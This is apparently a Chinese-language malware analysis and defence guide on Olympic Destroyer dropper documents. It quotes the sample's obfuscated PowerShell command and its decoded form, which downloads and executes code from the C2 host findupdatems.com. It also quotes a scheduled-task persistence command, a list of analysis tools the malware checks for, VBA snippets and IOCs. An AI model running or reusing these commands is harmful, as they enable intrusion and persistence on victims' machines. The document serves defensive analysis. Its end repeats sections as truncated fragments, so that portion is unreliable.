Olympic Destroyer Droppers 技术分析与防御指南<\/h1>

1. 概述<\/h2>
Olympic Destroyer 是由 Hades APT 组织开发的一种恶意软件，主要用于针对特定目标的高级持续性威胁(APT)攻击。本文档将详细分析其最新变种的技术特点、攻击流程和防御措施。<\/p>

2. 样本基本信息<\/h2>

MD5<\/strong>: cd15a7c3cb1725dc9d21160c26ab9c2e<\/li>
文件名<\/strong>: "ТЕХНИЧЕСКОЕ_ЗАДАНИЕ_НА_РАЗРАБОТКУ_МОБИЛЬНОГО_ПРИЛОЖЕНИЯ.doc" (俄语，意为"移动应用开发技术规范")<\/li>
创建日期<\/strong>: 2018-10-09 07:23:00<\/li>

作者<\/strong>: James<\/li> <\/ul>
3. 攻击流程分析<\/h2>
3.1 初始感染阶段<\/h3>

诱饵文档<\/strong>:<\/p>

初始显示为空白页<\/li>
启用宏后，宏将白色文本变为黑色，显示实际内容<\/li>
内容来源于网络的合法文档，具有高度欺骗性<\/li> <\/ul> <\/li>

WMI反分析<\/strong>:<\/p>

使用WMI查询运行进程<\/li>
将进程名与40多种分析工具进行比较<\/li>
检查进程数量(至少40个)以识别沙箱环境<\/li> <\/ul> <\/li> <\/ol>
3.2 反分析技术<\/h3>
检测的分析工具列表<\/strong>:<\/p>
HaCKER, MalzILlA, pRocExP, WiREShARK, HxD, PowERsheLl_iSE, idA, Olly, fiDDLEr, mALwAre, VmtoOLsd, SWingBoX, vboXTrAY, secunia, hijack, VmtoOlsd', Vbox, vMWaRE, VXsTReaM, AUtOIt, vmToOls, TcpVIeW, WiREShARK, prOCEss expLorer, VIsuAl bASiC, fiDDLEr <\/code><\/pre> 3.3 持久化与执行<\/h3> 释放HTA文件<\/strong>:<\/p> 路径: %APPDATA%\WPFT532.hta<\/code><\/li> <\/ul> <\/li> 计划任务创建<\/strong>:<\/p> schtasks \/Create \/F \/SC DAILY \/ST "10:20"<\/span> \/TN "DriveCloudTaskCoreCheck"<\/span> \/TR "mshta C:\\Users\\[user]\\AppData\\Roaming\\WPFT532.hta"<\/span> <\/span><\/span><\/code><\/pre> 参数说明: \/F<\/code>: 强制创建任务<\/li> \/SC<\/code>: 计划每日任务<\/li> \/ST<\/code>: 开始时间<\/li> \/TN<\/code>: 任务名称<\/li> <\/ul> <\/li> <\/ul> <\/li> HTA执行<\/strong>:<\/p> 使用VBScript解码下一阶段命令行<\/li> 技术与宏阶段相同<\/li> <\/ul> <\/li> <\/ol> 3.4 Powershell下载与执行<\/h3> 混淆的Powershell命令<\/strong>:<\/p> c:\\WiNDOws\\sYsTEM32\\Cmd.eXE \/c "Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116,114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 , 107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 , 120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 , 114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50, 43 ,91 , 99 ,104, 65, 114 , 93,49,48,56, 43, 91 ,99, 104, 65,114,93 , 49 , 50 ,50,41,44, 39, 124 , 39 ,41 , 124 , 32, 46 , 32 , 40 , 32 ,36, 69, 110 ,86 , 58,67 , 79, 109 , 83, 80, 101 , 99 ,91,52 , 44 ,50, 52 ,44 ,50,53, 93 , 45 , 106,79 ,73 ,110 ,39 , 39, 41)pshOme[21]+$PSHoMe[30]+'x') &&Set gnPq=ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ^| pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -&& c:\\WiNDOws\\sYsTEM32\\Cmd.eXE \/c %gNpq%"<\/span> <\/span><\/span><\/code><\/pre>去混淆后的Powershell阶段1<\/strong>:<\/p> ('(N'<\/span>+'ew-O'<\/span>+'bject Net.W'<\/span>+'ebclient)'<\/span>+'.'<\/span>+'downlo'<\/span>+'adstring(Hl'<\/span>+'jht'<\/span>+'tp:'<\/span>+'\/\/findupda'<\/span>+'te'<\/span>+'ms.com\/ch'<\/span>+'e'<\/span>+'ck\/in'<\/span>+'dexHlj)'<\/span>+'4j'<\/span>+'zIEX'<\/span>).RepLaCe(([chAr]<\/span>72+[chAr]<\/span>108+[chAr]<\/span>106),[StrIng][chAr]<\/span>39).RepLaCe(([chAr]<\/span>52+[chAr]<\/span>106+[chAr]<\/span>122),'|'<\/span>) <\/span><\/span><\/code><\/pre>去混淆后的Powershell阶段2<\/strong>:<\/p> (New-Object Net.Webclient).downloadstring('http:\/\/findupdatems.com\/check\/index'<\/span>)|IEX <\/span><\/span><\/code><\/pre>4. 技术特征<\/h2> 4.1 元数据特征<\/h3> 文档作者通常为: James, john 或 AV Dummy<\/li> <\/ul> 4.2 编码与混淆技术<\/h3> 字符串编码<\/strong>:<\/p> 使用自定义解码函数(如 MSART8)<\/li> 通过减少每个字符的ASCII值(减一个常数)进行编码<\/li> 不同样本使用不同的常数值<\/li> <\/ul> <\/li> 十六进制转换<\/strong>:<\/p> 将十六进制字符串转换为文本<\/li> <\/ul> <\/li> <\/ol> 4.3 文档诱饵技术<\/h3> 移除诱饵图像<\/strong>:<\/p> For Each o In ActiveDocument.InlineShapes o.Delete Next o <\/code><\/pre> <\/li> 文本颜色变化<\/strong>:<\/p> ActiveDocument.Range.Font.Hidden = False <\/code><\/pre> <\/li> <\/ol> 4.4 触发器技术<\/h3> 避免使用常见的AutoOpen触发器，使用以下非常规触发器:<\/p> MultiPage1_LayoutFrame1_LayoutSystemMonitor1_GotFocus Image1_MouseMove ImageCombo21_Change <\/code><\/pre> 5. 网络基础设施<\/h2> 使用被黑服务器作为C2代理<\/li> 请求被重定向到Empire后台服务器<\/li> 使用修改版的Empire hop.php作为代理<\/li> <\/ul> 示例请求<\/strong>:<\/p> e160ca75a0e8c4bc9177f412b09e7a29 (首次出现: 2018-06-05) ac85b1fff1fe43ddad28bf1c4ce021c5 (首次出现: 2018-10-11) <\/code><\/pre> 6. 防御措施<\/h2> 6.1 预防措施<\/h3> 宏安全设置<\/strong>:<\/p> 禁用Office文档中的宏执行<\/li> 或设置为"仅允许受信任位置的宏"<\/li> <\/ul> <\/li> 用户教育<\/strong>:<\/p> 培训用户识别可疑文档<\/li> 警惕来自未知来源的文档<\/li> <\/ul> <\/li> 系统加固<\/strong>:<\/p> 限制WMI查询权限<\/li> 禁用不必要的计划任务创建<\/li> <\/ul> <\/li> <\/ol> 6.2 检测措施<\/h3> 行为监控<\/strong>:<\/p> 监控异常的WMI查询<\/li> 检测计划任务的异常创建<\/li> <\/ul> <\/li> 网络监控<\/strong>:<\/p> 拦截对已知恶意域名的访问(findupdatems.com等)<\/li> 检测异常的HTTP下载行为<\/li> <\/ul> <\/li> 文件监控<\/strong>:<\/p> 监控%APPDATA%目录下的HTA文件创建<\/li> 检测文档中的异常宏代码<\/li> <\/ul> <\/li> <\/ol> 6.3 响应措施<\/h3> 隔离感染主机<\/strong><\/li> 分析计划任务和持久化机制<\/strong><\/li> 检查网络连接日志<\/strong><\/li> 更新杀毒软件特征库<\/strong><\/li> <\/ol> 7. IOC (Indicators of Compromise)<\/h2> 文件哈希<\/strong>:<\/p> MD5: cd15a7c3cb1725dc9d21160c26ab9c2e<\/li> <\/ul> <\/li> 网络IOC<\/strong>:<\/p> C2 URL: http:\/\/findupdatems.com\/check\/index<\/li> <\/ul> <\/li> 文件路径<\/strong>:<\/p> %APPDATA%\WPFT532.hta<\/li> 计划任务名: DriveCloudTaskCoreCheck<\/li> <\/ul> <\/li> <\/ul> 8. 总结<\/h2> Hades APT组织持续进化其Olympic Destroyer恶意软件，最新变种增加了反分析和延迟执行功能，能够有效规避沙箱检测。防御此类攻击需要多层次的安全策略，包括严格的宏安全设置、用户教育和全面的监控措施。<\/p>

Olympic Destroyer Droppers 技术分析与防御指南<\/h1>

1. 概述<\/h2> Olympic Destroyer 是由 Hades APT 组织开发的一种恶意软件，主要用于针对特定目标的高级持续性威胁(APT)攻击。本文档将详细分析其最新变种的技术特点、攻击流程和防御措施。<\/p>

3. 攻击流程分析<\/h2>

4. 技术特征<\/h2>

6. 防御措施<\/h2>

8. 总结<\/h2> Hades APT组织持续进化其Olympic Destroyer恶意软件，最新变种增加了反分析和延迟执行功能，能够有效规避沙箱检测。防御此类攻击需要多层次的安全策略，包括严格的宏安全设置、用户教育和全面的监控措施。<\/p>

1. 概述<\/h2>
Olympic Destroyer 是由 Hades APT 组织开发的一种恶意软件，主要用于针对特定目标的高级持续性威胁(APT)攻击。本文档将详细分析其最新变种的技术特点、攻击流程和防御措施。<\/p>

8. 总结<\/h2>
Hades APT组织持续进化其Olympic Destroyer恶意软件，最新变种增加了反分析和延迟执行功能，能够有效规避沙箱检测。防御此类攻击需要多层次的安全策略，包括严格的宏安全设置、用户教育和全面的监控措施。<\/p>